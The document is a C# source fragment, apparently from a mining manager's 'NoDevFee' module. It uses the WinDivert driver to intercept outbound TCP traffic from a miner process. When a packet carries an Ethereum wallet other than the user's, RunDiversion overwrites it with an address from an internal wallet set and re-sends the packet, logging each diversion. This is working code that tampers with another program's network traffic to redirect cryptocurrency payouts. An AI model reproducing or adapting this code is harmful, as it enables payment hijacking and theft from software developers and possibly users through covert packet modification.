private static void RunDiversion(
ref IntPtr divertHandle,
KernelInfo kernelInfo,
string workerName,
string userWallet,
ref int counter)
{
byte[] packet = new byte[65535];
try {
while (true)
{
if (_isStopping)
{
//Logger.OkDebugLine("NoDevFee结束");
return;
}
uint readLength = 0;
WINDIVERT_IPHDR * ipv4Header = null;
WINDIVERT_TCPHDR *tcpHdr = null;
WINDIVERT_ADDRESS addr = new WINDIVERT_ADDRESS();
if (!SafeNativeMethods.WinDivertRecv(divertHandle, packet, (uint)packet.Length, ref addr, ref readLength))
{
continue;
}
fixed(byte *inBuf = packet)
{
byte *payload = null;
SafeNativeMethods.WinDivertHelperParsePacket(inBuf, readLength, &ipv4Header, null, null, null, &tcpHdr, null, &payload, null);
if (ipv4Header != null && tcpHdr != null && payload != null)
{
string ansiText = Marshal.PtrToStringAnsi((IntPtr)payload);
if (TryGetPosition(kernelInfo, workerName, ansiText, out var position))
{
string wallet = EthWalletSet.Instance.GetOneWallet();
if (!string.IsNullOrEmpty(wallet))
{
byte[] byteWallet = Encoding.ASCII.GetBytes(wallet);
string dwallet = Encoding.UTF8.GetString(packet, position, byteWallet.Length);
if (!dwallet.StartsWith(userWallet) && ethWalletRegex.IsMatch(dwallet))
{
string dstIp = ipv4Header->DstAddr.ToString();
var dstPort = tcpHdr->DstPort;
Buffer.BlockCopy(byteWallet, 0, packet, position, byteWallet.Length);
Logger.InfoDebugLine($"::第 {++counter} 次");
Logger.InfoDebugLine($":: {dwallet}");
//Logger.InfoDebugLine($":: {wallet}");
Logger.InfoDebugLine($":: {dstIp}:{dstPort.ToString()}");
}
}
}
}
}
SafeNativeMethods.WinDivertHelperCalcChecksums(packet, readLength, 0);
SafeNativeMethods.WinDivertSendEx(divertHandle, packet, readLength, 0, ref addr, IntPtr.Zero, IntPtr.Zero);
}
}
catch (Exception e) {
Logger.ErrorDebugLine(e);
return;
}
}
public static void StartAsync()
{
// Win7下WinDivert.sys文件签名问题
if (VirtualRoot.IsLTWin10)
{
return;
}
if (_currentKernelInfo != null)
{
Process[] processes = Process.GetProcessesByName(_currentKernelInfo.ProcessName);
if (processes.Length == 0)
{
Stop();
return;
}
}
if (!TryGetCommandLine(out KernelInfo kernelInfo, out string minerName, out string userWallet))
{
Stop();
return;
}
_currentKernelInfo = kernelInfo;
if (!_isStopping)
{
return;
}
_isStopping = false;
Logger.InfoDebugLine($"用户矿机名 {minerName}, 用户钱包 {userWallet}");
WaitHandle.Set();
WaitHandle = new AutoResetEvent(false);
Task.Factory.StartNew(() => {
WinDivertExtract.Extract();
int counter = 0;
string filter = $"outbound && ip && ip.DstAddr != 127.0.0.1 && tcp && tcp.PayloadLength > 100";
IntPtr divertHandle = SafeNativeMethods.WinDivertOpen(filter, WINDIVERT_LAYER.WINDIVERT_LAYER_NETWORK, 0, 0);
if (divertHandle != IntPtr.Zero)
{
Task.Factory.StartNew(() => {
Logger.InfoDebugLine($"反水启动");
WaitHandle.WaitOne();
if (divertHandle != IntPtr.Zero)
{
SafeNativeMethods.WinDivertClose(divertHandle);
divertHandle = IntPtr.Zero;
}
Logger.InfoDebugLine($"反水停止");
}, TaskCreationOptions.LongRunning);
int numberOfProcessors = Environment.ProcessorCount;
Logger.InfoDebugLine($"{numberOfProcessors}并行");
Parallel.ForEach(Enumerable.Range(0, numberOfProcessors), (Action <int>)(x => {
RunDiversion(
divertHandle: ref divertHandle,
kernelInfo: kernelInfo,
workerName: minerName,
userWallet: userWallet,
counter: ref counter);
}));
Logger.OkDebugLine($"NoDevFee closed");
}
else
{
Logger.WarnDebugLine($"NoDevFee start failed.");
}
}, TaskCreationOptions.LongRunning);
}